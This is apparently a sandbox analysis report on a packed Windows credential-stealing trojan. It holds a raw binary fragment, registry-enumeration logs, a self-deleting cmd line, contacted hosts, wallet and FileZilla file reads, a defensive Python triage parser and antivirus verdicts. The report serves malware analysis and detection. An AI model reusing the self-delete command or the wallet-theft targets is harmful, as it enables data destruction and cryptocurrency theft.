:ŋL%÷Á(bu:Ô3˅ûÉø‰¡RÝy÷ÑùÁ;bøfýÁyñŽj¹{øf…ßf÷Åô;÷Ñf÷Å6‰wy;ùø3ÙùùéÀ+øÑÀ3Øfü£$øWÃf;ÅöÅÝú‹¶3ˁéu.1|é$é<õfÈf‰Nœøfºñ[¿üÿÿÿ‹3ËéyI1ùÇf;ó3ËùÑÁúì3Ž_f…ƍ‰õ;õ…á€ûô÷ÙõøÁÉf…́é3TõùÑÁ÷Ã8÷Dé:Nw!÷сéž%øÁÁù÷Ã<eT/÷ÙIöÂÑõ3Ùéé?é]ù(3Ëõ÷Ñf;æùÁšwcõû[Œh÷Ùùøé»õ5êéß<ò›ÎˆN¸H‡LEËxfôúÜxYàÂ¥Þa‰$÷è?ÿEMƒc¢\Fá×LÌ/T-¡ç€Ïü1$áÅÿÿÿÿýáKYÍ Àòfdà[Øîß¾;o :¥´ |”ÃþüÑy lIlÚTgÂǀəhÛ¢öÌÿÿÿúþ2?~¹@“{ÏS¨ÔNfÞy¬ã´ KOYÜõ{~¤!:‡9yÉxý՟.‡¿WÇ!‡ Éz8‡Ï—üwg7ËÛxe·›‡þ®úN‡tìÍxFŒ¸Úx!yëåxßF?‡[#ÆØx‰‰ž×x—·#Îx± D?š÷Dz÷Ær/)‡§õ
request_handle: 0x00cc003c
1 1 0
section {u'size_of_data': u'0x00414c00', u'virtual_address': u'0x00298000', u'entropy': 7.927531865525298, u'name': u'.vmp1', u'virtual_size': u'0x00414b10'} entropy 7.92753186553 description A section with a high entropy has been found
entropy 0.978573937478 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
base_handle: 0x80000002
key_handle: 0x000002bc
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
1 0 0

RegOpenKeyExW

regkey_r: AddressBook
base_handle: 0x000002bc
key_handle: 0x000002b4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExW

regkey_r: Connection Manager
base_handle: 0x000002bc
key_handle: 0x000002b8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExW

regkey_r: DirectDrawEx
base_handle: 0x000002bc
key_handle: 0x000002c0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExW

regkey_r: EditPlus
base_handle: 0x000002bc
key_handle: 0x000002c4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
1 0 0

RegOpenKeyExW

regkey_r: ENTERPRISE
base_handle: 0x000002bc
key_handle: 0x000002c8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
1 0 0

RegOpenKeyExW

regkey_r: Fontcore
base_handle: 0x000002bc
key_handle: 0x000002cc
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExW

regkey_r: Google Chrome
base_handle: 0x000002bc
key_handle: 0x000002d0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExW

regkey_r: Haansoft HWord 80 Korean
base_handle: 0x000002bc
key_handle: 0x000002d4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
1 0 0

RegOpenKeyExW

regkey_r: IE40
base_handle: 0x000002bc
key_handle: 0x000002d8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExW

regkey_r: IE4Data
base_handle: 0x000002bc
key_handle: 0x000002dc
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0

RegOpenKeyExW

regkey_r: IE5BAKEX
base_handle: 0x000002bc
key_handle: 0x000002e0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
1 0 0

RegOpenKeyExW

regkey_r: IEData
base_handle: 0x000002bc
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData
1 0 0

RegOpenKeyExW

regkey_r: MobileOptionPack
base_handle: 0x000002bc
key_handle: 0x000002e8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
1 0 0

RegOpenKeyExW

regkey_r: SchedulingAgent
base_handle: 0x000002bc
key_handle: 0x000002ec
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
1 0 0

RegOpenKeyExW

regkey_r: WIC
base_handle: 0x000002bc
key_handle: 0x000002f0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC
1 0 0

RegOpenKeyExW

regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
base_handle: 0x000002bc
key_handle: 0x000002f4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
1 0 0

RegOpenKeyExW

regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980}
base_handle: 0x000002bc
key_handle: 0x000002f8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
1 0 0

RegOpenKeyExW

regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
base_handle: 0x000002bc
key_handle: 0x000002fc
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0015-0412-0000-0000000FF1CE}
base_handle: 0x000002bc
key_handle: 0x00000300
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0016-0412-0000-0000000FF1CE}
base_handle: 0x000002bc
key_handle: 0x00000304
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0018-0412-0000-0000000FF1CE}
base_handle: 0x000002bc
key_handle: 0x00000308
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0019-0412-0000-0000000FF1CE}
base_handle: 0x000002bc
key_handle: 0x0000030c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-001A-0412-0000-0000000FF1CE}
base_handle: 0x000002bc
key_handle: 0x00000310
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-001B-0412-0000-0000000FF1CE}
base_handle: 0x000002bc
key_handle: 0x00000314
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-001F-0409-0000-0000000FF1CE}
base_handle: 0x000002bc
key_handle: 0x00000318
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-001F-0412-0000-0000000FF1CE}
base_handle: 0x000002bc
key_handle: 0x0000031c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0028-0412-0000-0000000FF1CE}
base_handle: 0x000002bc
key_handle: 0x00000320
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-002C-0412-0000-0000000FF1CE}
base_handle: 0x000002bc
key_handle: 0x00000324
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0030-0000-0000-0000000FF1CE}
base_handle: 0x000002bc
key_handle: 0x00000328
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0044-0412-0000-0000000FF1CE}
base_handle: 0x000002bc
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-006E-0409-0000-0000000FF1CE}
base_handle: 0x000002bc
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-006E-0412-0000-0000000FF1CE}
base_handle: 0x000002bc
key_handle: 0x00000334
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-00A1-0412-0000-0000000FF1CE}
base_handle: 0x000002bc
key_handle: 0x00000338
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-00BA-0409-0000-0000000FF1CE}
base_handle: 0x000002bc
key_handle: 0x0000033c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0114-0412-0000-0000000FF1CE}
base_handle: 0x000002bc
key_handle: 0x00000340
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4}
base_handle: 0x000002bc
key_handle: 0x00000344
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}
1 0 0

RegOpenKeyExW

regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40}
base_handle: 0x000002bc
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}
1 0 0

RegOpenKeyExW

regkey_r: {d992c12e-cab2-426f-bde3-fb8c53950b0d}
base_handle: 0x000002bc
key_handle: 0x0000034c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}
1 0 0
Time & API Arguments Status Return Repeated

InternetOpenW

proxy_name:
proxy_bypass:
flags: 0
user_agent: XyqYNP3LKVAxuRLmSk7Z
access_type: 0
1 13369372 0
cmdline chcp 65001
cmdline cmd.exe /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\test22\AppData\Local\Temp\cock.mp4"
cmdline "C:\Windows\System32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\test22\AppData\Local\Temp\cock.mp4"
cmdline ping 127.0.0.1
section .vmp0 description Section name indicates VMProtect
section .vmp1 description Section name indicates VMProtect
host 128.199.63.64
host 185.121.177.177
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
file C:\Users\test22\AppData\Roaming\Electrum\wallets
file C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
Time & API Arguments Status Return Repeated

RegQueryValueExW

key_handle: 0x000002c4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002d0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002d4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002f8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002fc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000300
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Access MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000304
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Excel MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000308
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office PowerPoint MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000030c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Publisher MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000310
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Outlook MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000314
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Word MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000318
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000031c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000320
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office IME (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000324
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000328
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office InfoPath MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000330
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000334
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000338
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OneNote MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000033c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000340
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000344
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 ActiveX
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000348
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 NPAPI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000034c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName
1 0 0
process cock.mp4 useragent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36
process cock.mp4 useragent XyqYNP3LKVAxuRLmSk7Z
file C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet
file C:\Users\test22\AppData\Local\Temp\1.exe:Zone.Identifier
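The registry calls above are a textbook installed-software inventory: the sample walks every subkey of HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall and reads its DisplayName (browsers, Office MUI packs, Flash, the VC++ runtime), and the file indicators show it touching an Exodus wallet file and the Zone.Identifier stream of a dropped 1.exe. The following triage helper is an added example, not code from the ZeroBOX report or the sample itself: it parses a constructed excerpt in the same layout as the dump (three RegQueryValueExW records and the two file paths copied from the report), lists the products the sample enumerated, and flags the wallet and Mark-of-the-Web paths. The reading of the trailing "1 0 0" line as Cuckoo's status/return/repeated columns and the indicator labels are assumptions of this example.

```python
# Added example (not part of the ZeroBOX report): triage helper for the
# Cuckoo/ZeroBOX-style API-call dump above. It parses RegQueryValueExW records,
# lists the DisplayName values the sample read from the Uninstall key
# (installed-software enumeration), and flags the wallet and Zone.Identifier paths.
import re
from collections import Counter

# Constructed excerpt: three records copied from the report, same flattened layout.
SAMPLE_API_LOG = r"""
RegQueryValueExW

key_handle: 0x000002d4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000344
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 ActiveX
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000034c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName
1 0 0
"""

# The two file paths listed in the report's file indicators.
SAMPLE_FILES = [
    r"C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet",
    r"C:\Users\test22\AppData\Local\Temp\1.exe:Zone.Identifier",
]

API_RE = re.compile(r"^[A-Za-z_]\w*$")          # bare API-name line
STATUS_RE = re.compile(r"^(\d+) (\d+) (\d+)$")   # trailing "1 0 0" line
UNINSTALL_RE = re.compile(
    r"\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\(?P<product_key>[^\\]+)\\(?P<value_name>[^\\]+)$",
    re.I,
)
# Indicator labels are this example's own; the patterns match the report's two paths.
FILE_INDICATORS = [
    ("cryptocurrency wallet access", re.compile(r"\\Exodus\\exodus\.wallet$", re.I)),
    ("Zone.Identifier (Mark-of-the-Web) stream on dropped EXE", re.compile(r"\.exe:Zone\.Identifier$", re.I)),
]


def parse_api_log(text):
    """Turn the flattened dump into records of the form {api, args, status}."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if API_RE.match(line):
            current = {"api": line, "args": {}, "status": None}
        elif STATUS_RE.match(line) and current is not None:
            # Assumption: the three trailing integers are Cuckoo's
            # status / return / repeated columns; they are stored untouched.
            current["status"] = tuple(int(x) for x in line.split())
            records.append(current)
            current = None
        elif ":" in line and current is not None:
            key, value = line.split(":", 1)
            current["args"][key.strip()] = value.strip()
    return records


def installed_software_enumeration(records):
    """DisplayName values read through ...\\CurrentVersion\\Uninstall\\<key>."""
    products = []
    for rec in records:
        if rec["api"] != "RegQueryValueExW":
            continue
        m = UNINSTALL_RE.search(rec["args"].get("regkey", ""))
        if m and m.group("value_name").lower() == "displayname":
            products.append(rec["args"].get("value", ""))
    return products


def classify_files(paths):
    """Pair each touched path with every indicator label it matches."""
    return [(label, p) for p in paths for label, rx in FILE_INDICATORS if rx.search(p)]


def triage(api_log, touched_files):
    records = parse_api_log(api_log)
    return {
        "api_counts": dict(Counter(r["api"] for r in records)),
        "products_enumerated": installed_software_enumeration(records),
        "file_indicators": classify_files(touched_files),
    }


if __name__ == "__main__":
    result = triage(SAMPLE_API_LOG, SAMPLE_FILES)
    print("API calls:", result["api_counts"])
    print(f"Installed software read from Uninstall key ({len(result['products_enumerated'])}):")
    for product in result["products_enumerated"]:
        print("  -", product)
    for label, path in result["file_indicators"]:
        print(f"  [{label}] {path}")
```

Run against the full dump, the product list is what the sample learned about the victim; a long run of Uninstall\...\DisplayName reads with no install activity of its own is the host-profiling behaviour worth writing a detection for, and the wallet-file read is what turns a generic Androm/Sabsik verdict into a credential-theft concern.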
Lionic Trojan.Win32.Androm.m!c
Cylance Unsafe
K7GW Trojan ( 7000001c1 )
K7AntiVirus Trojan ( 7000001c1 )
BitDefenderTheta Gen:NN.ZexaE.34218.@F1@aydqv0hi
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Generik.JQZCPUD
APEX Malicious
Kaspersky Backdoor.Win32.Androm.uuli
Sophos Mal/VMProtBad-A
McAfee-GW-Edition Artemis!Trojan
FireEye Generic.mg.d050948cba26749c
SentinelOne Static AI - Suspicious PE
GData Win32.Trojan-Stealer.CredStealer.5F65S2
eGambit PE.Heur.InvalidSig
Kingsoft Win32.Hack.Androm.uu.(kcloud)
Gridinsoft Trojan.Win32.Sabsik.oa
Microsoft Trojan:Win32/Sabsik.FL.B!ml
Acronis suspicious
McAfee Artemis!D050948CBA26
Ikarus Win32.Outbreak
